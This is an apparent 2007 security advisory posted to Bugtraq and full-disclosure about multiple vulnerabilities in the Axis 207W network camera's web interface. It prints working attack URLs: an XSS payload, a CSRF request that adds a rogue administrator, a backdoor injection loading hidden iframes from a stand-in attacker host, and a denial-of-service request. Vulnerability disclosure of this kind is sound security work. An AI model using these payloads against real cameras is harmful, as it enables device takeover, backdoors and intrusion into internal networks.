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Message-ID: <46EBE87A.8030705@airscanner.com>
Date: Sat, 15 Sep 2007 10:13:14 -0400
From: Seth Fogie <seth@...scanner.com>
To: bugtraq@...urityfocus.com, full-disclosure@...ts.grok.org.uk
Subject: Axis 207W Wireless Camera Web Interface -
Multiple Vulnerabilities
http://airscanner.com/security/07080701_axis.htm
*Airscanner Mobile Security Advisory #07080101: Axis 207W Multiple
Vulnerabilities*
*Product:*
AXIS 207W
*Platform:*
NA
*Requirements:*
AXIS 207W Camera on WLAN/LAN
* Credits:*
Seth Fogie
Airscanner Mobile Security
http://www.airscanner.com
May 30, 2007
* Risk Level:*
High - Camera compromise leading to network compromise
*Program Summary:
*From the site: http://www.axis.com/products/cam_207/index.htm
The AXIS 207 offers the best image quality in its class, providing
excellent image quality also in low lighting conditions.
# Superior image quality with progressive scan
# 30 frames per second in VGA resolution (640x480 pixels)
# Network security using multiple user access levels with password
protection
*Details:*
Details are presented at http://www.informit.com/
<http://www.informit.com/articles/article.aspx?p=1016102>
In summary, the AXIS 207W is vulnerable to numerous attacks. Some of
these are related to wireless protocol vulnerabilities, but the majority
are exploitable via the web application interface included with the
camera. The most significant issue is that a CSRF attack against a user
logged in as an administrator can lead to root access of the Linux based
operating system on the camera. As a result, the camera can be turned
into an internal resource for any malicous hacker, through which custom
scripts can be launched. This can include port scans, banner grabbing,
buffer overflow exploits, application attacks, and more. Note that this
attack vector will bypass most firewalls.
Web Application:
# Base64 'encrypted' user/pass sent as plaintext from client to user.
# Global Cross-site scripting vulnerability:
http://<IP>/incl/image_incl.shtml?camNo=</script><script>alert(String.fromCharCode(88,83,83))</script>
# Cross-site Request Forgery attack leads to root access on camera
through which custom scripts can be executed:
1. Reboot the camera - http://1<IP>/axis-cgi/admin/restart.cgi
2. Add a new administrator -
http://<IP>/axis-cgi/admin/pwdgrp.cgi?action=add&user=owner1&grp=axuser&sgrp=axview:axoper:axadmin&pwd=owner1&comment=WebUser&return_page=/admin/users_set.shtml%3Fpageclose%3D1
3. Root the camera/add a backdoor -
http://<IP>/admin/restartMessage.shtml?server=<iframe%20style=visibility:hidden%20src=http://www.evilserver.com/wifi/axisbd.php><iframe
src=http://www.evilserver.com/wifi/axisrb.htm><!—
# Denial of Service attack via restricted user account:
http://<IP>/axis-cgi/buffer/command.cgi?do=start&buffername=<unique
buffer name>
* Workaround:*
None.
*Vendor Response:*
Vendor notified
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